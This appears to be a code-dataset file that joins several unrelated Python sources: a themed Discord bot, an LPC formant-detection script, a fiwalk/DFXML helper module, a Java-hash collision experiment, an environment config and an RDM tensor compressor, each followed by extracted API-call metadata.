@commands.guild_only()
@bot.command()
async def armor(ctx):
    """Deliver the armor; only `Mr.Stark` role holders get a safe journey."""
    import asyncio  # local import: needed only for the non-blocking delay
    role = discord.utils.get(ctx.guild.roles, name=accepted_role)
    if role in ctx.author.roles:
        await ctx.send(f"You armor will be delivered shortly, sir.")
        # BUG FIX: time.sleep() froze the whole bot (blocks the event loop
        # inside a coroutine); asyncio.sleep yields control instead.
        await asyncio.sleep(0.5)
        await ctx.send(f"Safe journey {ctx.author.mention}. :rocket:")
    else:
        await ctx.send(f"You armor will be delivered shortly, sir.")
        await ctx.send(f":no_entry_sign: Wait {ctx.author.mention}, you are not `{accepted_role}` :no_entry_sign:")
@commands.guild_only()
@bot.command()
async def friday(ctx):
    # Role-gated easter egg: the link is only sent to `Mr.Stark` role holders.
    role = discord.utils.get(ctx.guild.roles, name=accepted_role)
    if role in ctx.author.roles:
        await ctx.send(f"Check this out: https://www.youtube.com/watch?v=cjgldht4PKw")
    else:
        await ctx.send(f":no_entry_sign: I am sorry {ctx.author.mention}, but you have no power of `{accepted_role}` :no_entry_sign:")
@commands.guild_only()
@bot.command()
async def ultron(ctx):
    # Flavour command: no role check required.
    await ctx.send(f":shield: Thanks to {ctx.author.mention}, the Earth will have it's own shield :shield:")

@commands.guild_only()
@bot.command()
async def vision(ctx):
    # Flavour command: no role check required.
    await ctx.send(f":superhero: Hi {ctx.author.mention}, you can call me Vision from now on :superhero:")

@commands.guild_only()
@bot.command()
async def grid(ctx):
    # Flavour command: no role check required.
    await ctx.send(f":flag_no: No worries. I'll hide in the Grid, sir :flag_no:")
@commands.guild_only()
@bot.command()
async def help(ctx):
    # Custom replacement for the default help command (removed at start-up).
    help_desc = f"Here is a little help for you, sir. Available of commands can be seen below."
    e = discord.Embed(title=":question: Help :question:", description=help_desc)
    avengers = f"""\
`{prefix}ultron` - protect the Earth
`{prefix}vision` - turn into Vision
`{prefix}grid` - hide in the Internet
"""
    e.add_field(name="***Avengers***", value=avengers)
    stark = f"""\
`{prefix}armor` - summon Mr. Stark's armor
`{prefix}friday` - call for replacement
`{prefix}secret` - reveal one of Mr. Stark's secrets
"""
    e.add_field(name="***Stark***", value=stark)
    await ctx.send(embed=e)
@bot.event
async def on_command_error(ctx, error):
    """Global command error handler: friendly embed for unknown commands,
    silence for permission (403) failures, console log for anything else."""
    if isinstance(error, commands.errors.CommandNotFound):
        e = discord.Embed(title=":exclamation: No such command :exclamation:", description="Try `!!help`")
        await ctx.send(embed=e)
    elif "403 Forbidden" in str(error):
        # BUG FIX: `"403 Forbidden" in error` raised TypeError because
        # exception objects do not support `in`; compare the string form.
        return
    else:
        print(f"---- Unknown error: {error} ----")
        return

bot.run(TOKEN)
"os.getenv",
"discord.ext.commands.Bot",
"discord.utils.get",
"discord.ext.commands.guild_only",
"time.sleep",
"dotenv.load_dotenv",
"discord.Embed"
] | [((123, 136), 'dotenv.load_dotenv', 'load_dotenv', ([], {}), '()\n', (134, 136), False, 'from dotenv import load_dotenv\n'), ((145, 171), 'os.getenv', 'os.getenv', (['"""DISCORD_TOKEN"""'], {}), "('DISCORD_TOKEN')\n", (154, 171), False, 'import os\n'), ((371, 429), 'discord.ext.commands.Bot', 'commands.Bot', ([], {'command_prefix': 'prefix', 'case_insensitive': '(True)'}), '(command_prefix=prefix, case_insensitive=True)\n', (383, 429), False, 'from discord.ext import commands\n'), ((542, 563), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (561, 563), False, 'from discord.ext import commands\n'), ((902, 923), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (921, 923), False, 'from discord.ext import commands\n'), ((1420, 1441), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (1439, 1441), False, 'from discord.ext import commands\n'), ((1813, 1834), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (1832, 1834), False, 'from discord.ext import commands\n'), ((1984, 2005), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (2003, 2005), False, 'from discord.ext import commands\n'), ((2153, 2174), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (2172, 2174), False, 'from discord.ext import commands\n'), ((2295, 2316), 'discord.ext.commands.guild_only', 'commands.guild_only', ([], {}), '()\n', (2314, 2316), False, 'from discord.ext import commands\n'), ((613, 667), 'discord.utils.get', 'discord.utils.get', (['ctx.guild.roles'], {'name': 'accepted_role'}), '(ctx.guild.roles, name=accepted_role)\n', (630, 667), False, 'import discord\n'), ((972, 1026), 'discord.utils.get', 'discord.utils.get', (['ctx.guild.roles'], {'name': 'accepted_role'}), '(ctx.guild.roles, name=accepted_role)\n', (989, 1026), False, 'import discord\n'), ((1491, 1545), 'discord.utils.get', 'discord.utils.get', (['ctx.guild.roles'], 
{'name': 'accepted_role'}), '(ctx.guild.roles, name=accepted_role)\n', (1508, 1545), False, 'import discord\n'), ((2457, 2529), 'discord.Embed', 'discord.Embed', ([], {'title': '""":question: Help :question:"""', 'description': 'help_desc'}), "(title=':question: Help :question:', description=help_desc)\n", (2470, 2529), False, 'import discord\n'), ((289, 322), 'os.getenv', 'os.getenv', (['"""FLAG"""', '"""bts{tmpflag}"""'], {}), "('FLAG', 'bts{tmpflag}')\n", (298, 322), False, 'import os\n'), ((1137, 1147), 'time.sleep', 'sleep', (['(0.5)'], {}), '(0.5)\n', (1142, 1147), False, 'from time import sleep\n'), ((3091, 3189), 'discord.Embed', 'discord.Embed', ([], {'title': '""":exclamation: No such command :exclamation:"""', 'description': '"""Try `!!help`"""'}), "(title=':exclamation: No such command :exclamation:',\n description='Try `!!help`')\n", (3104, 3189), False, 'import discord\n')] |
#
# pr9_3_1
from audiolazy import lazy_lpc
from scipy.signal import lfilter, find_peaks
from LPC import LPC
from Universal import *
if __name__ == '__main__':
    filename = 'snn27.wav'
    speech = Speech()
    x, fs = speech.audioread(filename, None)  # read one frame data
    u = lfilter(b=np.array([1, -0.99]), a=1, x=x)  # pre-emphasis
    wlen = len(u)  # frame length
    p = 12  # LPC order
    ar = lazy_lpc.lpc.autocor(u, p)  # LPC coefficients
    ar0 = ar.numerator
    U = LPC().lpcar2pf(ar0, 255)  # LPC coefficients --> spectrum
    freq = np.arange(257) * fs / 512  # frequency scale in the frequency domain
    df = fs / 512  # frequency resolution
    U_log = 10 * np.log10(U)
    Loc, _ = find_peaks(U.reshape(np.size(U), ))  # peak location
    Val = U[Loc]  # peak value
    LenLoc = len(Loc)  # peak number
    F = np.zeros(LenLoc)  # format frequency
    BW = np.zeros(LenLoc)  # band width
    # Parabolic interpolation around each spectral peak refines the formant
    # frequency and estimates its bandwidth (the (9-3-x) tags reference the
    # textbook equations this script was ported from).
    # NOTE(review): `p` (the LPC order above) is reused as the peak value
    # inside this loop, and m2 = m + 1 would index past the array end if a
    # peak sat on the last bin — confirm inputs make that impossible.
    for k in range(LenLoc):
        m = Loc[k]  # set m, m-1, m+1
        m1 = m - 1
        m2 = m + 1
        p = Val[k]  # set P(m), P(m-1), P(m+1)
        p1 = U[m1]
        p2 = U[m2]
        aa = (p1 + p2) / 2 - p  # (9-3-4)
        bb = (p2 - p1) / 2
        cc = p
        dm = -bb / 2 / aa  # (9-3-6)
        pp = - bb * bb / 4 / aa + cc  # (9-3-8)
        m_new = m + dm
        bf = -np.sqrt(bb * bb - 4 * aa * (cc - pp / 2)) / aa  # (9-3-13)
        # NOTE(review): the "- 1" looks like a MATLAB 1-based index
        # carry-over; with 0-based numpy indexing it may shift F by one bin.
        F[k] = (m_new - 1) * df  # (9-3-7)
        BW[k] = bf * df  # (9-3-14)

    np.set_printoptions(precision=2)
    print('Format = {}'.format(F))
    print('Band Width = {}'.format(BW))

    # figure
    plt.figure(figsize=(16, 9))
    plt.subplot(2, 1, 1)
    plt.plot(u)
    plt.xlabel('Sample points')
    plt.ylabel('Amplitude')
    plt.title('Pre-emphasis Signal Spectrum')
    plt.axis([0, wlen, -0.5, 0.5])
    plt.subplot(2, 1, 2)
    plt.plot(freq, U)
    # Mark each detected peak and drop a dashed stem down to the axis.
    for k in range(LenLoc):
        plt.plot(freq[Loc[k]], Val[k], 'r', marker='o', markersize=8)
        plt.plot(np.array([freq[Loc[k]], freq[Loc[k]]], dtype=object), np.array([0, Val[k]], dtype=object), 'r-.',
                 linewidth=2)
    plt.xlabel('Frequency [Hz]')
    plt.ylabel('Amplitude [dB]')
    plt.title('Vocal Transfer Function Power Spectrum')
    plt.axis([0, 4000, 0, max(U) + 2])
    plt.savefig('images/lpc_format_detection.png', bbox_inches='tight', dpi=600)
    plt.show()
| [
"audiolazy.lazy_lpc.lpc.autocor",
"LPC.LPC"
] | [((391, 417), 'audiolazy.lazy_lpc.lpc.autocor', 'lazy_lpc.lpc.autocor', (['u', 'p'], {}), '(u, p)\n', (411, 417), False, 'from audiolazy import lazy_lpc\n'), ((463, 468), 'LPC.LPC', 'LPC', ([], {}), '()\n', (466, 468), False, 'from LPC import LPC\n')] |
#!/usr/bin/env python
# This software was developed in whole or in part by employees of the
# Federal Government in the course of their official duties, and with
# other Federal assistance. Pursuant to title 17 Section 105 of the
# United States Code portions of this software authored by Federal
# employees are not subject to copyright protection within the United
# States. For portions not authored by Federal employees, the Federal
# Government has been granted unlimited rights, and no claim to
# copyright is made. The Federal Government assumes no responsibility
# whatsoever for its use by other parties, and makes no guarantees,
# expressed or implied, about its quality, reliability, or any other
# characteristic.
#
# We would appreciate acknowledgement if the software is used.
__version__="0.7.0"
"""fiwalk module
This is the part of dfxml that is dependent on fiwalk.py
"""
import os
import sys
sys.path.append( os.path.join(os.path.dirname(__file__), ".."))
import dfxml
from sys import stderr
from subprocess import Popen,PIPE
ALLOC_ONLY = 1
fiwalk_cached_installed_version = None
def fiwalk_installed_version(fiwalk='fiwalk'):
    """Return the version of the installed fiwalk binary, caching the result.

    Runs ``fiwalk -V`` and scans its output for a "FIWalk Version:" or
    "SleuthKit Version:" line.  Returns the version string, or None when no
    recognizable version line is printed.
    """
    global fiwalk_cached_installed_version
    if fiwalk_cached_installed_version:
        return fiwalk_cached_installed_version
    from subprocess import Popen,PIPE
    import re
    output = Popen([fiwalk,'-V'],stdout=PIPE).stdout.read().decode('utf-8')
    for line in output.split("\n"):
        # Raw strings: "\s" in a non-raw literal is an invalid escape
        # sequence (SyntaxWarning on modern Pythons).  Both labels share
        # one alternation instead of two duplicated match blocks.
        g = re.search(r"^(?:FIWalk|SleuthKit) Version:\s+(.*)$", line)
        if g:
            fiwalk_cached_installed_version = g.group(1)
            return fiwalk_cached_installed_version
    return None
class XMLDone(Exception):
    """Control-flow exception used to abort SAX parsing early.

    Carries the version string (or None) found so far in ``value``.
    """
    def __init__(self, payload):
        # Deliberately skips Exception.__init__; callers only read .value.
        self.value = payload
class version:
    """Expat SAX handler that pulls the creator/version string out of a
    DFXML file.

    Parsing is aborted early by raising XMLDone as soon as the version
    is found, or when a <volume> element is reached (meaning the header
    has been passed without finding one).
    """
    def __init__(self):
        self.cdata = ""        # accumulated character data for the current element
        self.in_element = []   # stack of currently-open element names
        self.version = None
    def start_element(self,name,attrs):
        if(name=='volume'): # too far?
            raise XMLDone(None)
        self.in_element += [name]
        self.cdata = ""
    def end_element(self,name):
        # Three element layouts are recognized, covering different
        # fiwalk/dfxml generations; membership (not strict nesting order)
        # in the open-element stack is what is tested here.
        if ("fiwalk" in self.in_element) and ("creator" in self.in_element) and ("version" in self.in_element):
            raise XMLDone(self.cdata)
        if ("fiwalk" in self.in_element) and ("fiwalk_version" in self.in_element):
            raise XMLDone(self.cdata)
        if ("version" in self.in_element) and ("dfxml" in self.in_element) and ("creator" in self.in_element):
            raise XMLDone(self.cdata)
        self.in_element.pop()
        self.cdata = ""
    def char_data(self,data):
        # Expat may deliver text in several chunks; accumulate them.
        self.cdata += data
    def get_version(self,fn):
        """Parse file *fn*; return the version string, or None on XML error."""
        import xml.parsers.expat
        p = xml.parsers.expat.ParserCreate()
        p.StartElementHandler = self.start_element
        p.EndElementHandler = self.end_element
        p.CharacterDataHandler = self.char_data
        try:
            p.ParseFile(open(fn,'rb'))
        except XMLDone as e:
            return e.value
        except xml.parsers.expat.ExpatError:
            return None # XML error
def fiwalk_xml_version(filename=None):
    """Return the fiwalk version recorded inside a DFXML file.

    Quick-and-dirty: a throwaway SAX handler scans the file only as far
    as needed to find the creator/version element.
    """
    return version().get_version(filename)
################################################################
def E01_glob(fn):
    """If the filename ends .E01, then glob it.  Currently only handles
    E01 through EZZ.

    Returns the list of segment files that exist on disk, in order,
    starting with *fn* itself (*fn* is included even if it does not
    exist).  The scan stops at the first missing segment.

    BUG FIX: the original placed this docstring after the ``import``
    statement, so it was never attached as the function's docstring.
    """
    import os.path
    ret = [fn]
    if fn.endswith(".E01") and os.path.exists(fn):
        # Numeric segments: .E02 through .E99
        fmt = fn.replace(".E01",".E%02d")
        for i in range(2,100):
            f2 = fmt % i
            if not os.path.exists(f2):
                return ret
            ret.append(f2)
        # Got through E99, now do EAA through EZZ
        # ('%c' formats an int as the character with that code point)
        fmt = fn.replace(".E01",".E%c%c")
        for i in range(0,26):
            for j in range(0,26):
                f2 = fmt % (i+ord('A'),j+ord('A'))
                if not os.path.exists(f2):
                    return ret
                ret.append(f2)
        return ret # don't do F01 through F99, etc.
    return ret
def fiwalk_xml_stream(imagefile=None,flags=0,fiwalk="fiwalk",fiwalk_args=""):
    """ Returns an fiwalk XML stream given a disk image by running fiwalk.

    imagefile   - an open file object for the disk image (its .name is
                  passed through E01_glob to pick up .E0x segments)
    flags       - bit flags; ALLOC_ONLY adds fiwalk's "-O" option
    fiwalk      - path to the fiwalk executable
    fiwalk_args - extra command-line arguments, whitespace separated

    Raises RuntimeError if the fiwalk executable cannot be run.
    """
    if flags & ALLOC_ONLY:
        # BUG FIX: append "-O" as a separate, space-delimited token.  The
        # original `fiwalk_args += "-O"` fused "-O" onto the last
        # caller-supplied argument, corrupting the .split() below.
        fiwalk_args += " -O"
    from subprocess import call,Popen,PIPE
    # Make sure we have a valid fiwalk
    try:
        res = Popen([fiwalk,'-V'],stdout=PIPE).communicate()[0]
    except OSError:
        raise RuntimeError("Cannot execute fiwalk executable: "+fiwalk)
    cmd = [fiwalk,'-x']
    if fiwalk_args: cmd += fiwalk_args.split()
    p = Popen(cmd + E01_glob(imagefile.name),stdout=PIPE)
    return p.stdout
def fiwalk_using_sax(imagefile=None,xmlfile=None,fiwalk="fiwalk",flags=0,callback=None,fiwalk_args=""):
    """Process an image with expat, invoking *callback* for every file
    object encountered.

    If *xmlfile* is not supplied, fiwalk is run on *imagefile* to
    produce the XML stream.
    """
    import dfxml
    if xmlfile is None:
        xmlfile = fiwalk_xml_stream(imagefile=imagefile, flags=flags,
                                      fiwalk=fiwalk, fiwalk_args=fiwalk_args)
    reader = dfxml.fileobject_reader(flags=flags)
    reader.imagefile = imagefile
    reader.process_xml_stream(xmlfile, callback)
def fileobjects_using_sax(imagefile=None,xmlfile=None,fiwalk="fiwalk",flags=0):
    """Return the list of all file objects found via the SAX reader."""
    collected = []
    def _keep(fi):
        # Accumulate every file object the reader reports.
        collected.append(fi)
    fiwalk_using_sax(imagefile=imagefile, xmlfile=xmlfile, fiwalk=fiwalk,
                     flags=flags, callback=_keep)
    return collected
def fileobjects_using_dom(imagefile=None,xmlfile=None,fiwalk="fiwalk",flags=0,callback=None):
    """Process an image with the DOM reader, returning the file objects.

    If *xmlfile* is provided, use that as the xmlfile, otherwise run
    fiwalk on *imagefile*.

    NOTE(review): *callback* is accepted (presumably for signature
    parity with fiwalk_using_sax) but never used here — confirm intent.
    """
    import dfxml
    if xmlfile is None:
        xmlfile = fiwalk_xml_stream(imagefile=imagefile, flags=flags, fiwalk=fiwalk)
    return dfxml.fileobjects_dom(xmlfile=xmlfile, imagefile=imagefile, flags=flags)
ctr = 0  # running file-object count, updated by cb_count()
def cb_count(fn):
    """Callback that simply counts how many times it was invoked."""
    global ctr
    ctr = ctr + 1
if __name__=="__main__":
import sys
for fn in sys.argv[1:]:
print("{} contains fiwalk version {}".format(fn,fiwalk_xml_version(fn)))
# Count the number of files
fiwalk_using_sax(xmlfile=open(fn,'rb'),callback=cb_count)
print("Files: {}".format(ctr))
| [
"os.path.exists",
"subprocess.Popen",
"dfxml.fileobject_reader",
"os.path.dirname",
"dfxml.fileobjects_dom",
"re.search"
] | [((5442, 5478), 'dfxml.fileobject_reader', 'dfxml.fileobject_reader', ([], {'flags': 'flags'}), '(flags=flags)\n', (5465, 5478), False, 'import dfxml\n'), ((6201, 6273), 'dfxml.fileobjects_dom', 'dfxml.fileobjects_dom', ([], {'xmlfile': 'xmlfile', 'imagefile': 'imagefile', 'flags': 'flags'}), '(xmlfile=xmlfile, imagefile=imagefile, flags=flags)\n', (6222, 6273), False, 'import dfxml\n'), ((948, 973), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (963, 973), False, 'import os\n'), ((1506, 1550), 're.search', 're.search', (['"""^FIWalk Version:\\\\s+(.*)$"""', 'line'], {}), "('^FIWalk Version:\\\\s+(.*)$', line)\n", (1515, 1550), False, 'import re\n'), ((1683, 1730), 're.search', 're.search', (['"""^SleuthKit Version:\\\\s+(.*)$"""', 'line'], {}), "('^SleuthKit Version:\\\\s+(.*)$', line)\n", (1692, 1730), False, 'import re\n'), ((3767, 3785), 'os.path.exists', 'os.path.exists', (['fn'], {}), '(fn)\n', (3781, 3785), False, 'import os\n'), ((3900, 3918), 'os.path.exists', 'os.path.exists', (['f2'], {}), '(f2)\n', (3914, 3918), False, 'import os\n'), ((4222, 4240), 'os.path.exists', 'os.path.exists', (['f2'], {}), '(f2)\n', (4236, 4240), False, 'import os\n'), ((4720, 4754), 'subprocess.Popen', 'Popen', (["[fiwalk, '-V']"], {'stdout': 'PIPE'}), "([fiwalk, '-V'], stdout=PIPE)\n", (4725, 4754), False, 'from subprocess import call, Popen, PIPE\n'), ((1418, 1452), 'subprocess.Popen', 'Popen', (["[fiwalk, '-V']"], {'stdout': 'PIPE'}), "([fiwalk, '-V'], stdout=PIPE)\n", (1423, 1452), False, 'from subprocess import call, Popen, PIPE\n')] |
# Program to check how effective is Java's String's Hash Collision
# for generating hash codes for Indian Phone No.s
import random
from pprint import pprint
# Number of random phone numbers to generate for the experiment.
SAMPLE_SPACE = 10000
def genJavaHashCode(phone: str) -> int:
    """Return Java's String.hashCode() polynomial for *phone*.

    s[0]*31^(n-1) + s[1]*31^(n-2) + ... + s[n-1]
    where :
    s[i] - is the ith character of the string
    n    - is the length of the string, and
    ^    - indicates exponentiation

    Evaluated with Horner's rule, which is O(n) instead of recomputing
    31**k for every character as the original did.  Values are identical
    to the original implementation.

    NOTE(review): Java wraps this in 32-bit signed arithmetic; Python
    ints do not overflow, so for long strings the value can exceed
    Java's actual hashCode.  That does not affect collision counting,
    which is what this script measures.
    """
    h = 0
    for ch in phone:
        h = h * 31 + ord(ch)
    return h
def genPhoneNo():
    """
    Indian Phone No.s usually begin with 7, 8, or 9.
    ( This doesn't include the country code +91. )
    Others are usually scam calls or from other countries.
    They are 10 digits long.
    """
    # First digit is 7-9, followed by nine unconstrained digits.
    digits = [str(random.randint(7, 9))]
    for _ in range(9):
        digits.append(str(random.randint(0, 9)))
    return ''.join(digits)
# Deduplicated sample of random phone numbers (the set collapses duplicate
# draws, so len(phone_nos) may be slightly below SAMPLE_SPACE).
phone_nos = set([genPhoneNo() for _ in range(SAMPLE_SPACE)])
hash_to_phone = {}  # hashCode -> first phone number seen with that code
hashCollisions = 0  # collision counter, intended to be updated by populateHashMap()
def populateHashMap():
    """Fill hash_to_phone with hashCode -> phone, counting collisions.

    BUG FIX: the original incremented the module-level
    ``hashCollisions`` without a ``global`` declaration, so the first
    collision raised UnboundLocalError instead of being counted.
    """
    global hashCollisions
    for phone in phone_nos:
        hashCode = genJavaHashCode(phone)
        if hashCode in hash_to_phone:  # .keys() lookup was redundant
            hashCollisions += 1
        else:
            hash_to_phone[hashCode] = phone
if __name__ == '__main__':
    # pprint(phone_nos)
    populateHashMap()
    # Report the absolute collision count and the collision rate relative
    # to the (deduplicated) sample of phone numbers.
    print(f"Hash Collisions: {hashCollisions}")
    print(f"hashCollisions rate = {hashCollisions / len(phone_nos)}")
| [
"random.randint"
] | [((764, 784), 'random.randint', 'random.randint', (['(7)', '(9)'], {}), '(7, 9)\n', (778, 784), False, 'import random\n'), ((800, 820), 'random.randint', 'random.randint', (['(0)', '(9)'], {}), '(0, 9)\n', (814, 820), False, 'import random\n')] |
import os
# Application configuration pulled from environment variables.
TWO_WEEKS = 1209600  # 14 days, in seconds
# NOTE(review): validating required config with `assert` is stripped when
# Python runs with -O; an explicit raise would be safer — confirm before
# changing, as callers may rely on AssertionError at import time.
SECRET_KEY = os.getenv('SECRET_KEY', None)
assert SECRET_KEY
TOKEN_EXPIRES = TWO_WEEKS
# Falls back to a Docker-link-style env var (DB_PORT_5432_TCP_ADDR) for the
# database host when DATABASE_URL is not set directly.
DATABASE_URL = os.getenv(
    'DATABASE_URL',
    'postgres://postgres@{0}:5432/postgres'.format(os.getenv('DB_PORT_5432_TCP_ADDR', None)))
assert DATABASE_URL
# Redis host also falls back to the Docker-link-style variable; password may
# legitimately be absent (None).
REDIS_HOST = os.getenv('REDIS_HOST', os.getenv('REDIS_PORT_6379_TCP_ADDR', None))
REDIS_PASSWORD = os.getenv('REDIS_PASSWORD', None)
| [
"os.getenv"
] | [((46, 75), 'os.getenv', 'os.getenv', (['"""SECRET_KEY"""', 'None'], {}), "('SECRET_KEY', None)\n", (55, 75), False, 'import os\n'), ((382, 415), 'os.getenv', 'os.getenv', (['"""REDIS_PASSWORD"""', 'None'], {}), "('REDIS_PASSWORD', None)\n", (391, 415), False, 'import os\n'), ((320, 363), 'os.getenv', 'os.getenv', (['"""REDIS_PORT_6379_TCP_ADDR"""', 'None'], {}), "('REDIS_PORT_6379_TCP_ADDR', None)\n", (329, 363), False, 'import os\n'), ((219, 259), 'os.getenv', 'os.getenv', (['"""DB_PORT_5432_TCP_ADDR"""', 'None'], {}), "('DB_PORT_5432_TCP_ADDR', None)\n", (228, 259), False, 'import os\n')] |
import numpy as np
class Compressor():
    """Pack and unpack a 4-index tensor of shape (num_spin_orbitals,)*4.

    compress() stores only the upper triangles of three matricized
    sub-blocks of the tensor; decompress() restores the full tensor,
    rebuilding the remaining mixed blocks from transposes and sign flips
    of the stored middle block.  NOTE(review): those sign/transpose
    rules encode a symmetry assumption about the input tensor (it looks
    like a 2-RDM in spin-block form) — confirm against the producer of
    `rdm`.
    """
    def __init__(self,
                num_particles: int, num_spin_orbitals: int, rdm_ideal=None) -> None:
        # num_particles: stored but never read by this class.
        self.num_particles = num_particles
        # num_spin_orbitals: linear dimension of each tensor axis.
        self.num_spin_orbitals = num_spin_orbitals
        # rdm_ideal: optional reference tensor; only used by the
        # commented-out debugging diffs in decompress().
        self.rdm_ideal = rdm_ideal
        pass

    def compress(self, rdm):
        """Return a 1-D array holding three packed upper triangles.

        The stored blocks are rdm[:n,:n,:n,:n], rdm[:n,n:,:n,n:] and
        rdm[n:,n:,n:,n:] (n = num_spin_orbitals // 2), each flattened to
        an (N, N) matrix before triangle extraction.
        """
        N = self.num_spin_orbitals ** 2 // 4
        # get num of elements by square formula of triangle
        S = self._get_num_elems_of_tri_mat(N)
        n = self.num_spin_orbitals // 2
        # mat = self._tensor2matrix(rdm)
        utri_arr = np.zeros((3*S,))
        utri_arr[: S] = \
            self._compress_matrix_to_upper_triangle_array(self._tensor2matrix(rdm[:n, :n, :n, :n]))
        utri_arr[S: 2*S] = \
            self._compress_matrix_to_upper_triangle_array(self._tensor2matrix(rdm[:n, n:, :n, n:]))
        utri_arr[2*S: ] = \
            self._compress_matrix_to_upper_triangle_array(self._tensor2matrix(rdm[n:, n:, n:, n:]))
        return utri_arr

    def decompress(self, utri_arr):
        """Rebuild the full 4-index tensor from compress() output.

        The middle stored triangle (block A) is expanded first; blocks
        B, C and D are derived from A by axis transposes and sign flips,
        then the first and last triangles fill the remaining diagonal
        blocks.
        """
        # rdm = np.zeros((self.num_spin_orbitals ** 2,) * 2) # matrix
        rdm = np.zeros((self.num_spin_orbitals,) * 4) # tensor
        N = self.num_spin_orbitals ** 2 // 4
        n = self.num_spin_orbitals // 2
        # get num of elements by square formula of triangle
        S = self._get_num_elems_of_tri_mat(N)
        # restore from the second triangle
        A = self._restore_matrix_by_upper_triangle_array(utri_arr[S: 2*S], N)
        A_tensor = self._matrix2tensor(A)
        # Derived blocks: swap of the last two axes negates (B), swap of
        # both index pairs preserves (C), swap of the first pair negates (D).
        B = - A_tensor.transpose([0, 1, 3, 2])
        # B = self._tensor2matrix(B)
        C = A_tensor.transpose([1, 0, 3, 2])
        # C = self._tensor2matrix(C)
        D = - A_tensor.transpose([1, 0, 2, 3])
        # restore middle 4
        # rdm[N: 2*N, N: 2*N] = A
        # diff = np.linalg.norm(self._tensor2matrix(self.rdm_ideal)[N: 2*N, N: 2*N] - A)
        rdm[:n, n:, :n, n:] = A_tensor
        # diff = np.linalg.norm(self.rdm_ideal[:n, n:, :n, n:] - A_tensor)
        # print('A', diff)
        # rdm[N: 2*N, 2*N: 3*N] = B
        # diff = np.linalg.norm(self._tensor2matrix(self.rdm_ideal)[N: 2*N, 2*N: 3*N] - B)
        rdm[:n, n:, n:, :n] = B
        # diff = np.linalg.norm(self.rdm_ideal[:n, n:, n:, :n] - B)
        # print('B', diff)
        # rdm[2*N: 3*N, 2*N: 3*N] = C
        # diff = np.linalg.norm(self._tensor2matrix(self.rdm_ideal)[2*N: 3*N, 2*N: 3*N] - C)
        rdm[n:, :n, n:, :n] = C
        # diff = np.linalg.norm(self.rdm_ideal[n:, :n, n:, :n] - C)
        # print('C', diff)
        rdm[n:, :n, :n, n:] = D
        # diff = np.linalg.norm(self.rdm_ideal[n:, :n, :n, n:] - D)
        # print('D', diff)
        # rdm = self._tensor2matrix(rdm)
        # restore upper left
        rdm[:n, :n, :n, :n] = \
            self._matrix2tensor(self._restore_matrix_by_upper_triangle_array(utri_arr[: S], N))
        # diff = np.linalg.norm(self.rdm_ideal[:n, :n, :n, :n] - rdm[:n, :n, :n, :n])
        # print('upper left', diff)
        # restore button right
        rdm[n:, n:, n:, n:] = \
            self._matrix2tensor(self._restore_matrix_by_upper_triangle_array(utri_arr[2*S:], N))
        # diff = np.linalg.norm(self.rdm_ideal[n:, n:, n:, n:] - rdm[n:, n:, n:, n:])
        # print('button right', diff)
        # rdm = self._tensor2matrix(rdm)
        # utri = np.triu(rdm)
        # diag = np.diag(np.diag(rdm))
        # utri -= diag
        # rdm = utri + utri.T + diag
        return rdm #self._matrix2tensor(rdm)

    @staticmethod
    def _restore_matrix_by_upper_triangle_array(utri_arr, n):
        """Expand a packed upper triangle into a full symmetric (n, n) matrix."""
        cnt = 0
        utri = np.zeros((n,) * 2) # upper triangular matrix
        for i in range(n):
            for j in range(i, n):
                utri[i, j] = utri_arr[cnt]
                cnt += 1
        # Mirror across the diagonal; subtract diag once so it is not doubled.
        diag = np.diag(np.diag(utri))
        mat = utri + utri.T - diag
        return mat

    @staticmethod
    def _compress_matrix_to_upper_triangle_array(mat):
        """Pack the upper triangle (including diagonal) of a square matrix
        into a flat array, row by row."""
        n = mat.shape[0]
        num_elements = Compressor._get_num_elems_of_tri_mat(n)
        # NOTE(review): (num_elements) is not a tuple, but np.zeros accepts
        # a bare integer, so this works as written.
        utri_arr = np.zeros((num_elements))
        cnt = 0
        for i in range(n):
            for j in range(i, n):
                utri_arr[cnt] = mat[i, j]
                cnt += 1
        return utri_arr

    @staticmethod
    def _get_num_elems_of_tri_mat(n):
        # Triangular number: count of entries on/above the diagonal.
        return (n + 1) * n // 2

    @staticmethod
    def _matrix2tensor(mat, transpose=False):
        """Reshape an (n^2, n^2) matrix into an (n, n, n, n) tensor,
        optionally swapping the last two axes."""
        n = int(np.sqrt(mat.shape[0]))
        if transpose:
            tensor = mat.reshape((n,) * 4).transpose([0, 1, 3, 2])
        else:
            tensor = mat.reshape((n,) * 4)
        return tensor

    @staticmethod
    def _tensor2matrix(tensor, transpose=False):
        """Flatten an (n, n, n, n) tensor into an (n^2, n^2) matrix,
        optionally swapping the last two axes first."""
        n = tensor.shape[0]
        if transpose:
            mat = tensor.transpose([0, 1, 3, 2]).reshape((n*n,) * 2)
        else:
            mat = tensor.reshape((n*n,) * 2)
        return mat

    @staticmethod
    def _utri_mat2real_sym_mat(utri):
        """Symmetrize an upper-triangular matrix: mirror the triangle across
        the diagonal without doubling the diagonal itself."""
        diag = np.diag(np.diag(utri))
        mat = utri + utri.T - diag
        return mat
| [
"numpy.zeros",
"numpy.sqrt",
"numpy.diag"
